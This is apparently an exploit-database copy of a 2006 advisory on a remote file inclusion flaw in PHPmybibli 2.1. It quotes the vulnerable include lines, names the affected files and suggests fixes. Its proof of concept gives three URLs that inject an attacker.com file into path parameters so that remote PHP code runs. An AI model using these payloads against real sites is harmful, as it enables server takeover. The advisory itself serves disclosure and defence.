header-logo
Suggest Exploit
vendor:
PHPmybibli
by:
Dedi Dwianto
9,3
CVSS
CRITICAL
Multiple Remote File Inclusion Vulnerability
98
CWE
Product Name: PHPmybibli
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:pizz:phpmybibli
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ECHO_ADV_55$2006

A vulnerability was found in the cart.php script of PHPmybibli version <=2.1, which allows remote attackers to include arbitrary files from local or external resources. This can be exploited to execute arbitrary PHP code by including malicious files.

Mitigation:

Ensure that user-supplied input is properly validated and filtered before being used in the application. This can be done by using a whitelist of accepted inputs that strictly conform to specifications.
Source

Exploit-DB raw data:

____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_55$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_55$2006]Phpmybibli  <=2.1  Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author		: Dedi Dwianto a.k.a the_day
Date Found	: October, 17th 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv55-theday-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: PHPmybibli
version		: <=2.1
URL		: http://www.pizz.net/

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

I found vulnerability script cart.php
--------------------------cart.php---------------------------------------
....
<?

  include_once("$include_path/cart.inc.php");
  include_once("$include_path/templates/cart.tpl.php");
  include_once("$include_path/isbn.inc.php");
  include_once("$include_path/expl_info.inc.php");
  include_once("$include_path/bull_info.inc.php");
  include_once("$include_path/notice_authors.inc.php");
  include_once("$include_path/notice_categories.inc.php");
  include_once("$include_path/explnum.inc.php");
  include_once("$class_path/cart.class.php");
  include_once("$class_path/caddie.class.php");
  include_once("$class_path/author.class.php");
  include_once("$class_path/collection.class.php");
  include_once("$class_path/subcollection.class.php");
  include_once("$class_path/mono_display.class.php");
  include_once("$class_path/serie.class.php");
  include_once("$class_path/serial_display.class.php");
  include_once("$class_path/serials.class.php");
  include_once("$class_path/editor.class.php");
  require_once("$class_path/emprunteur.class.php");
  require_once("$javascript_path/misc.inc.php");
...
----------------------------------------------------------

Input passed to the "$include_path" parameter in cart.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

edit.php
circ.php
index.php
select.php
etc..

Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt?

Solution:
~~~~~~

- Sanitize variable $class_path,$javascript_path,$include_path on affected files.
- Turn off register_globals


---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-10-17]

Navigation

Suggest Exploit

Services By CQR